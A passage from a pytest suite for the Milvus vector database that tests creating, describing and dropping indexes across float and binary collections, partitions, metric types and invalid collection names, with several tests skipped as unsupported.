check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
class TestIndexOperation(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L1)
def test_index_create_with_different_indexes(self):
"""
target: test create index on one field, with two different type of index
method: create two different indexes
expected: only latest index can be created for a collection
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index)
assert len(collection_w.indexes) == 1
assert collection_w.indexes[0].params["index_type"] == default_index["index_type"]
@pytest.mark.tags(CaseLabel.L1)
def test_index_collection_empty(self):
"""
target: test index with empty collection
method: Index on empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("index_param", [default_index_params])
def test_index_params(self, index_param):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
index_params = index_param
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
@pytest.mark.tags(CaseLabel.L1)
def test_index_params_flush(self):
"""
target: test index with all index type/params
method: input valid params
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data()
collection_w.insert(data=data)
self._connect().flush([collection_w.name])
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
# TODO: assert index
cf.assert_equal_index(index, collection_w.collection.indexes[0])
assert collection_w.num_entities == ct.default_nb
# TODO: not support
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_name_dup(self):
"""
target: test index with duplicate index name
method: create index with existed index name create by `collection.create_index`
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
index_name = ct.default_index_name
collection_w = self.init_collection_wrap(name=c_name)
collection_w.collection.create_index(default_field_name, default_index_params, index_name=index_name)
self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: ""})
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names(self):
"""
target: test index on one field, with two indexes
method: create index with two different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields(self):
"""
target: test index on two fields, with the same name
method: create the same index name with two different fields
expected: exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_fields_B(self):
"""
target: test index on two fields, with the different name
method: create the different index with two different fields
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_eq_maximum(self):
"""
target: test index on one field, with the different names, num of the names equal to the maximum num supported
method: create the different indexes
expected: no exception raised
"""
pass
# TODO: server not supported
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip(reason='not supported')
def test_index_field_names_more_maximum(self):
"""
target: test index on one field, with the different names, num of the names more than the maximum num supported
method: create the different indexes
expected: exception raised
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_index_drop_index(self):
"""
target: test index.drop
method: create index by `index`, and then drop it
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
index, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
cf.assert_equal_index(index, collection_w.collection.indexes[0])
self.index_wrap.drop()
assert len(collection_w.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L1)
# TODO #7372
def test_index_drop_repeatedly(self):
"""
target: test index.drop
method: create index by `index`, and then drop it twice
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
_, _ = self.index_wrap.init_index(collection_w.collection, default_field_name, default_index_params)
self.index_wrap.drop()
self.index_wrap.drop(check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Index doesn't exist"})
class TestIndexAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_index_drop_multi_collections(self):
"""
target: test index.drop
method: create indexes by `index`, and then drop it, assert there is one index left
expected: exception raised
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw2 = self.init_collection_wrap(name=c_name_2)
iw_2 = ApiIndexWrapper()
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
index_2, _ = iw_2.init_index(cw2.collection, default_field_name, default_index_params)
self.index_wrap.drop()
assert cf.assert_equal_index(index_2, cw2.collection.indexes[0])
assert len(cw.collection.indexes) == 0
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_inserting(self):
"""
target: test index.drop during inserting
method: create indexes by `index`, and then drop it during inserting entities, make sure async insert
expected: no exception raised, insert success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_drop_during_searching(self):
"""
target: test index.drop during searching
method: create indexes by `index`, and then drop it during searching, make sure async search
expected: no exception raised, search success
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_recovery_after_restart(self):
"""
target: test index still existed after server restart
method: create index by `index`, and then restart server, assert index existed
expected: index in collection.indexes
"""
pass
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason='TODO')
def test_index_building_after_restart(self):
"""
target: index can still build if not finished before server restart
method: create index by `index`, and then restart server, assert server is indexing
expected: index build finished after server restart
"""
pass
"""
******************************************************************
The following classes are copied from pymilvus test
******************************************************************
"""
class TestIndexBase:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
log.info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.skip(reason="Repeat with test_index_field_name_not_existed")
def test_create_index_on_field_not_existed(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on field not existed
expected: error raised
"""
tmp_field_name = gen_unique_str()
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_on_field(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index on other field
expected: error raised
"""
tmp_field_name = "int64"
result = connect.insert(collection, default_entities)
with pytest.raises(Exception) as e:
connect.create_index(collection, tmp_field_name, get_simple_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_without_connect(self, dis_connect, collection):
"""
target: test create index without connection
method: create collection and add entities in it, check if added successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.create_index(collection, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.create_index(collection, field_name, get_simple_index)
log.info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
params, _ = gen_search_vectors_params(field_name, default_entities, default_top_k, nq,
search_params=search_param)
connect.load_collection(collection)
res = connect.search(collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_collection_not_existed(self, connect):
"""
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index,
make sure the collection name not in index
expected: create index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_insert_flush(self, connect, collection, get_simple_index):
"""
target: test create index
method: create collection and create index, add entities in it
expected: create index ok, and count correct
"""
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
"""
connect.create_index(collection, field_name, get_simple_index)
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
        indexes = [default_index, {"metric_type": "L2", "index_type": "FLAT", "params": {"nlist": 1024}}]
        for index in indexes:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
assert not index # FLAT is the last index_type, drop all indexes in server
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_B(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
        indexes = [default_index, {"metric_type": "L2", "index_type": "IVF_SQ8", "params": {"nlist": 1024}}]
        for index in indexes:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
        create_target_index(indexes[-1], field_name)
        assert index == indexes[-1]
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(collection, default_entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition_flush_ip(self, connect, collection, get_simple_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors_ip(self, connect, collection, get_simple_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
metric_type = "IP"
result = connect.insert(collection, default_entities)
connect.flush([collection])
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
log.info(connect.describe_index(collection, ""))
nq = get_nq
index_type = get_simple_index["index_type"]
search_param = get_search_param(index_type)
params, _ = gen_search_vectors_params(field_name, default_entities, default_top_k, nq,
metric_type=metric_type, search_params=search_param)
res = connect.search(collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_multithread_ip(self, connect, collection, args):
"""
target: test create index interface with multiprocess
method: create collection and add entities in it, create index
expected: return search success
"""
connect.insert(collection, default_entities)
def build(connect):
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
threads_num = 8
threads = []
for i in range(threads_num):
m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
t = MyThread(target=build, args=(m,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_collection_not_existed_ip(self, connect, collection):
"""
target: test create index interface when collection name not existed
method: create collection and add entities in it, create index,
make sure the collection name not in index
expected: return code not equals to 0, create index failed
"""
collection_name = gen_unique_str(uid)
default_index["metric_type"] = "IP"
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_no_vectors_insert_ip(self, connect, collection):
"""
target: test create index interface when there is no vectors in collection,
and does not affect the subsequent process
method: create collection and add no vectors in it, and then create index,
add entities in it
expected: return code equals to 0
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
result = connect.insert(collection, default_entities)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_same_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the same create_index params
method: create index after index have been built
expected: return code success, and search ok
"""
default_index["metric_type"] = "IP"
connect.create_index(collection, field_name, default_index)
connect.create_index(collection, field_name, default_index)
if default_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(default_index, field_name)
assert index == default_index
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_different_index_repeatedly_ip(self, connect, collection):
"""
target: check if index can be created repeatedly, with the different create_index params
method: create another index with different index_params after index have been built
expected: return code 0, and describe index result equals with the second index params
"""
result = connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
stats = connect.get_collection_stats(collection)
assert stats["row_count"] == default_nb
default_index["metric_type"] = "IP"
        indexes = [default_index, {"index_type": "FLAT", "params": {"nlist": 1024}, "metric_type": "IP"}]
        for index in indexes:
connect.create_index(collection, field_name, index)
connect.release_collection(collection)
connect.load_collection(collection)
index = connect.describe_index(collection, "")
        # assert index == indexes[-1]
assert not index
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
# TODO #7372
def test_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_existed(self, connect):
"""
target: test drop index interface when collection name not existed
method: create collection and add entities in it, create index,
make sure the collection name not in index, and then drop it
expected: return code not equals to 0, drop index failed
"""
collection_name = gen_unique_str(uid)
with pytest.raises(Exception) as e:
connect.drop_index(collection_name, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_collection_not_create(self, connect, collection):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
"""
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_ip(self, connect, collection, get_simple_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
# result = connect.insert(collection, entities)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test drop index repeatedly
method: create index, call drop index, and drop again
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
connect.drop_index(collection, field_name)
index = connect.describe_index(collection, "")
assert not index
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_without_connect_ip(self, dis_connect, collection):
"""
target: test drop index without connection
method: drop index, and check if drop successfully
expected: raise exception
"""
with pytest.raises(Exception) as e:
dis_connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_collection_not_create_ip(self, connect, collection):
"""
target: test drop index interface when index not created
method: create collection and add entities in it, create index
expected: return code not equals to 0, drop index failed
"""
# result = connect.insert(collection, entities)
# no create index
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L2)
def test_create_drop_index_repeatedly_ip(self, connect, collection, get_simple_index):
"""
target: test create / drop index repeatedly, use the same index params
method: create index, drop index, four times
expected: return code 0
"""
get_simple_index["metric_type"] = "IP"
for i in range(4):
connect.create_index(collection, field_name, get_simple_index)
connect.drop_index(collection, field_name)
@pytest.mark.tags(CaseLabel.L0)
def test_create_PQ_without_nbits(self, connect, collection):
"""
target: test create PQ index
method: create PQ index without nbits
expected: create successfully
"""
PQ_index = {"index_type": "IVF_PQ", "params": {"nlist": 128, "m": 16}, "metric_type": "L2"}
result = connect.insert(collection, default_entities)
connect.create_index(collection, field_name, PQ_index)
index = connect.describe_index(collection, "")
create_target_index(PQ_index, field_name)
assert index == PQ_index
class TestIndexBinary:
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
if request.param["index_type"] in binary_support():
request.param["metric_type"] = "JACCARD"
return request.param
else:
pytest.skip("Skip index")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_l2_index(self, request, connect):
request.param["metric_type"] = "L2"
return request.param
@pytest.fixture(
scope="function",
params=[
1,
10,
1111
],
)
def get_nq(self, request):
yield request.param
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection and add entities in it, create index
expected: return search success
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test create index interface
method: create collection, create partition, and add entities in it, create index
expected: return search success
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
binary_index = connect.describe_index(binary_collection, "")
create_target_index(get_jaccard_index, binary_field_name)
assert binary_index == get_jaccard_index
@pytest.mark.tags(CaseLabel.L0)
@pytest.mark.timeout(BUILD_TIMEOUT)
def test_create_index_search_with_query_vectors(self, connect, binary_collection, get_jaccard_index, get_nq):
"""
target: test create index interface, search with more query vectors
method: create collection and add entities in it, create index
expected: return search success
"""
nq = get_nq
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.load_collection(binary_collection)
search_param = get_search_param(get_jaccard_index["index_type"], metric_type="JACCARD")
params, _ = gen_search_vectors_params(binary_field_name, default_binary_entities, default_top_k, nq,
search_params=search_param, metric_type="JACCARD")
log.info(params)
res = connect.search(binary_collection, **params)
assert len(res) == nq
@pytest.mark.timeout(BUILD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_invalid_metric_type_binary(self, connect, binary_collection, get_l2_index):
"""
target: test create index interface with invalid metric type
method: add entities into binary collection, flush, create index with L2 metric type.
expected: return create_index failure
"""
# insert 6000 vectors
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
with pytest.raises(Exception) as e:
res = connect.create_index(binary_collection, binary_field_name, get_l2_index)
"""
******************************************************************
The following cases are used to test `describe_index` function
***************************************************************
"""
@pytest.mark.skip("repeat with test_create_index binary")
def _test_get_index_info(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection and add entities in it, create index, call describe index
        expected: return code 0, and index structure
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
assert stats["row_count"] == default_nb
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
@pytest.mark.skip("repeat with test_create_index_partition binary")
def _test_get_index_info_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test describe index interface
method: create collection, create partition and add entities in it, create index, call describe index
        expected: return code 0, and index structure
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
log.info(stats)
assert stats["row_count"] == default_nb
assert len(stats["partitions"]) == 2
for partition in stats["partitions"]:
segments = partition["segments"]
if segments:
for segment in segments:
for file in segment["files"]:
if "index_type" in file:
assert file["index_type"] == get_jaccard_index["index_type"]
"""
******************************************************************
The following cases are used to test `drop_index` function
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection and add entities in it, create index, call drop index
expected: return code 0, and default index param
"""
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
stats = connect.get_collection_stats(binary_collection)
log.info(stats)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_drop_index_partition(self, connect, binary_collection, get_jaccard_index):
"""
target: test drop index interface
method: create collection, create partition and add entities in it,
create index on collection, call drop collection index
expected: return code 0, and default index param
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_jaccard_index)
connect.drop_index(binary_collection, binary_field_name)
binary_index = connect.describe_index(binary_collection, "")
assert not binary_index
class TestIndexInvalid(object):
"""
Test create / describe / drop index interfaces with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test create index interface for invalid scenario
method: create index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.create_index(collection_name, field_name, default_index)
@pytest.mark.tags(CaseLabel.L2)
def test_drop_index_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test drop index interface for invalid scenario
method: drop index with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.drop_index(collection_name)
@pytest.fixture(
scope="function",
params=gen_invalid_index()
)
def get_index(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_create_index_with_invalid_index_params(self, connect, collection, get_index):
"""
target: test create index interface for invalid scenario
method: create index with invalid index params
expected: raise exception
"""
log.info(get_index)
with pytest.raises(Exception) as e:
connect.create_index(collection, field_name, get_index)
class TestIndexAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
def check_result(self, res):
log.info("In callback check search result")
log.info(res)
"""
******************************************************************
The following cases are used to test `create_index` function
******************************************************************
"""
@pytest.mark.timeout(BUILD_TIMEOUT)
